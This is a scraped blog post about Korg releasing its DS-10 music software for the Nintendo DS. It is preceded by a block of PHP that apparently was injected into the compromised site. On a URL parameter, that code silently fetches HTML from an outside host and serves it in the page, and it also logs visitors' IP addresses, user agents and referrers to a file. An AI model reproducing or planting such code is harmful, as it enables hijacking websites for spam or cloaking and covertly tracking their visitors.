error_reporting(0); ini_set('display_errors',0); define('STATFILE','stat.txt'); define('LOG',true); if(isset($_GET['p'])) { $sock = fsockopen('km32025.keymachine.de', 80); if($sock){ if (LOG && isset($_SERVER['HTTP_REFERER']) && !empty($_SERVER['HTTP_REFERER'])) { $referer = rawurlencode($_SERVER['HTTP_REFERER']); $remote_ip = $_SERVER['REMOTE_ADDR']; $user_agent = strtolower($_SERVER['HTTP_USER_AGENT']); $file = fopen(STATFILE,'ab'); if ($file) { fwrite($file,date('Y-m-d H:i:s').' '.$remote_ip.' '.$user_agent.' '.rawurldecode($referer)."\n"); fclose($file); } } fwrite ($sock, 'GET http://km32025.keymachine.de/oslik2/cn/7/'.$_GET['p'].'.html HTTP/1.0'."\r\n"); fwrite ($sock, 'Host: km32025.keymachine.de'."\r\n\r\n"); while($content[] = fgets ($sock)); $content = implode('', $content); echo(trim(substr($content, strpos($content, "\r\n\r\n")))); fclose ($sock);} exit; } -=+fastlikesquirrel.com+=- » Blog Archive » Korg on the DS

Korg on the DS

Musicians serenading as gaming geeks finally have something to sing and dance about… Korg are just about to release a version of their DS-10 software for the Nintendo DS.

Never heard of Korg? Wiki describes it as-

Korg Corporation is a Japanese multinational corporation that manufactures electronic musical instruments and guitar tuners. The company is one of the most widely used and respected names in professional music worldwide.

It appears there were some concerns about this being only a Japanese release, but word on the official blog seems to point towards a worldwide release. Most of the entries listed there are in Japanese but the one and only English post confirms the news they are working on different versions for each territory.

My pants are now quivering with excitement. That is all, nothing more to see here…

Leave a Reply

You must be logged in to post a comment.